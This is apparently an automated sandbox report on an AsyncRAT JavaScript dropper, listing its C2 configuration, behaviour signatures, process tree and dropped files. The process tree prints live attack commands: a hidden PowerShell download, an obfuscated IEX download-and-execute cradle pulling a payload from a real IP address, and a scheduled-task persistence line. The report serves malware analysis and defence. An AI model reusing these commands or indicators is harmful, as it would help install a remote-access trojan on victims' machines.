Overview

overview

10

Static

static

1

ID-PCTS8435.js

windows7-x64

10

ID-PCTS8435.js

windows10-2004-x64

10

Analysis

  • max time kernel
    136s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15-11-2024 18:46

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ID-PCTS8435.js

  • Size

    2KB

  • MD5

    9881a8b65b41433a8d7a3bb68f382e94

  • SHA1

    5d7b75c19bf11e1a3996a83258030759344d67b1

  • SHA256

    0909faba191b7f68cc08f8fc4c4adeb91224086fdd79ce5b050811747afd00ce

  • SHA512

    7c555e960b1c9e9e8b3d89ce68b7dc1cdc230afcb3ca6cbab22f92aa72ac1e3a7a16a17e1725580f33dd8fa136ad3d7c350fd2d4e20c9378f28b46b8112c7080

Score
10/10
asyncrattnworkdiscoveryexecutionrat

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://66.206.25.2/1/text.txt

Extracted

Family

asyncrat

Version

| Edit 3LOSH RAT

Botnet

TNWork

C2

tnwork.kozow.com:5566

Mutex

AsyncMutex_6SI8fhjfhj

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Asyncrat family
    asyncrat
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 7 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\ID-PCTS8435.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3880
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -WindowStyle Hidden -Command "try { (New-Object System.Net.WebClient).DownloadFile('http://66.206.25.2/1/text.txt', 'C:\\Users\\Admin\\AppData\\Local\\Temp\\bOaMO2JH.txt'); Write-Output 'Download successful'; } catch { Write-Output 'Download failed: ' + $_.Exception.Message; exit 1; }"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4180
    • C:\Windows\System32\wscript.exe
      "C:\Windows\System32\wscript.exe" //B //E:VBScript C:\Users\Admin\AppData\Local\Temp\EHSETuyo.vbs
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:2972
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI $ilyx4o1rHq7BAzsED5IKaQfhJLgPnbGSFtdU9M6e2YTw0O8V3WcumRCZvXNkpj='IeX(NeW-OBJeCT NeT.W';$4nhGju6sBM7zNyKIprJ2Q0VCtLEaiSkqYOXdwvlWocx8bH9PZTefR1gUFD35Am='eBCLIeNT).DOWNLO';Sleep 2;[BYTe[]];Sleep 3;$R4dG8sgAcaZYbHNWhy10eqLiUTIxCjQMnD57P9F2ozpVBlXKJ3EmwOS6frtkuv='0YeaWxOt2LIUS4PHwbFEqzC57cZ69svRghJAlj1DfVr8y3uXkQGBiomNnpTMKd(''http://66.206.25.2/1/milos.pdf'')'.RePLACe('0YeaWxOt2LIUS4PHwbFEqzC57cZ69svRghJAlj1DfVr8y3uXkQGBiomNnpTMKd','ADSTRING');Sleep 1;IeX($ilyx4o1rHq7BAzsED5IKaQfhJLgPnbGSFtdU9M6e2YTw0O8V3WcumRCZvXNkpj+$4nhGju6sBM7zNyKIprJ2Q0VCtLEaiSkqYOXdwvlWocx8bH9PZTefR1gUFD35Am+$R4dG8sgAcaZYbHNWhy10eqLiUTIxCjQMnD57P9F2ozpVBlXKJ3EmwOS6frtkuv);
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Drops file in Windows directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4052
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /tn YyogGU3xi0 /tr C:\Windows\Help\HelpDesk\HelpDesk.vbs
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:1628
  • C:\Windows\System32\WScript.exe
    C:\Windows\System32\WScript.exe "C:\Windows\Help\HelpDesk\HelpDesk.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4236
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Windows\Help\HelpDesk\1.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1396
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Windows\Help\HelpDesk\imcq.ps1"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        PID:4868
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:3628
  • C:\Windows\System32\WScript.exe
    C:\Windows\System32\WScript.exe "C:\Windows\Help\HelpDesk\HelpDesk.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:392
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Windows\Help\HelpDesk\1.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1916
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Windows\Help\HelpDesk\imcq.ps1"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2656
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          4⤵
            PID:3664
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:3380

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      2KB

      MD5

      2f57fde6b33e89a63cf0dfdd6e60a351

      SHA1

      445bf1b07223a04f8a159581a3d37d630273010f

      SHA256

      3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

      SHA512

      42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      2b856bda56945fa7252034b16c0189f0

      SHA1

      df2d4ff8394cc57a8c399bfb5602679bfdcde06b

      SHA256

      ffc29461bd43b0ffffa1c06c260f5089cce205cab26a1a1032b924272b718205

      SHA512

      8843b6d91163d345e2aded8143d941388852ed3d4aa39ced89a3cf8a50bb908681624a7008c0b82359736cc3222f7908a1c34442028491921d243c0581aeb3e9

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      fcef00049285f2c3c0cc5b0401d3be54

      SHA1

      d8854f5d6ffd8d25c3595a962102c6731f475df0

      SHA256

      341ddb35f4d236e5344642484db6e524c27ac21fd920800e6fb835ed39d7029b

      SHA512

      61a98055cb44d567329441918219146d38a4a579a833c33cb4978d9efc60cd9ff5d1c56b7f1baa5610b3036315145cc572ae594942e468a10d368c963f44206a

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lmq0s3pf.1bm.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\bOaMO2JH.txt
      Filesize

      2KB

      MD5

      ffbbda28ff7b50ed78bba8bbb7761099

      SHA1

      98b963dcecc21de16d6278b2f56c0826a7751aca

      SHA256

      3957baa1567955f4542fd1c71ae2655c4f2ab3456a7c8e00a4be012ff167e26c

      SHA512

      a1815e8530c0d0a07c336c8d7a9f93977f406a8f33cfa4e87946f14bc98eeba628580c75870d88aff261ff559473eae338c586ae5025da262da02496a6029a0d

      Download Submit

    • C:\Windows\Help\HelpDesk\1.bat
      Filesize

      293B

      MD5

      0e2afb17ac9f0361c3e3832ff13fee86

      SHA1

      930d5b7171cf5cc1d60d3794391c828552f09be5

      SHA256

      2cccf60897b90ebe07a1953b8d3d42dc855c73d6b785de7f431364b622f125bd

      SHA512

      05e17567b8997075ac426a0e7bb8c3b02b99be4e91bdab915745a55faacf986084ff0bfdadbb4f72ffcb6021aaa78a861990c86d0766960bd9450ca476940345

      Download Submit

    • C:\Windows\Help\HelpDesk\1.txt
      Filesize

      181KB

      MD5

      8cdc1a736944d0c33c6f7dba1e507706

      SHA1

      4abf39b4d2b405561bc1314d76a686ea84be064f

      SHA256

      72f8bc1e9bd6facec3397ec79168a39d66f9e87adfbee7e327ede155e7020b53

      SHA512

      46d93e3d8f89f0c9c51439fb5e54c13a775583bc55fcbebf0eba1957d629025874ef959cfdc5e9bcfe91fe921cc1bfe4016f3befb354ddedcb63d2ca9239a05a

      Download Submit

    • C:\Windows\Help\HelpDesk\2.txt
      Filesize

      71KB

      MD5

      d78b23cf5fab540c42c57ce601f5aaef

      SHA1

      9f7c9894dfb0c1cc7074d72ef849f211f17d7cbb

      SHA256

      0da788f0daa7ca78829d512aba447e25e9673c064e0697ee8d388c0d90b99bc9

      SHA512

      8236c5f1a1f61502ce7136def35d80f19de8735efbbdb0087a6a48ccfdf2629b9a445b6891d718caba9c74a68c278eaf22f8e560b36055d31a6d13ced7625745

      Download Submit

    • C:\Windows\Help\HelpDesk\HelpDesk.vbs
      Filesize

      462B

      MD5

      192b8ec54ea8aa462768e974a09d8ace

      SHA1

      35ef4a97b37fa4913e1ac4194c08cc42156462bc

      SHA256

      0002b2aa5e332b848c97442991d5f58d90dc0f0c217a412d4a45945a3734cf5c

      SHA512

      6ef8b5034909670c8992406cc7580e66e1aa9f162f490dddb5f3cef4e9127f9d33bcb545ebc2c51f9414dd71a32596c83a01a1a36a98ec381a8ca2040f424a51

      Download Submit

    • C:\Windows\Help\HelpDesk\imcq.ps1
      Filesize

      1.1MB

      MD5

      44c7774572b603a560db400a0d755394

      SHA1

      fc1a662d8e8b85f591196110ef3ba855c0fd06b6

      SHA256

      5631b67b19a99b0556ae020b75b918c17a1914ce94f7706195ea92cf6d0b02b7

      SHA512

      2ca8835284bf4ea2cdba17e8cb11c3c62fc3ec1567fa707a4971f9edc8cb43827e4deacbc416bdad89623b2be76bf5612edce4561363f3325eb2a634cafecaf5

      Download Submit

    • memory/2656-59-0x00000233C88A0000-0x00000233C88AC000-memory.dmp

      Filesize

      48KB

      Download

    • memory/3628-44-0x00000000060C0000-0x000000000615C000-memory.dmp

      Filesize

      624KB

      Download

    • memory/3628-41-0x00000000058D0000-0x0000000005E74000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/3628-42-0x0000000005500000-0x0000000005592000-memory.dmp

      Filesize

      584KB

      Download

    • memory/3628-43-0x00000000054F0000-0x00000000054FA000-memory.dmp

      Filesize

      40KB

      Download

    • memory/3628-45-0x0000000006160000-0x00000000061C6000-memory.dmp

      Filesize

      408KB

      Download

    • memory/3628-40-0x0000000000400000-0x0000000000416000-memory.dmp

      Filesize

      88KB

      Download

    • memory/4180-0-0x00007FFA5E943000-0x00007FFA5E945000-memory.dmp

      Filesize

      8KB

      Download

    • memory/4180-16-0x00007FFA5E940000-0x00007FFA5F401000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4180-12-0x00007FFA5E940000-0x00007FFA5F401000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4180-11-0x00007FFA5E940000-0x00007FFA5F401000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4180-10-0x00000193B68F0000-0x00000193B6912000-memory.dmp

      Filesize

      136KB

      Download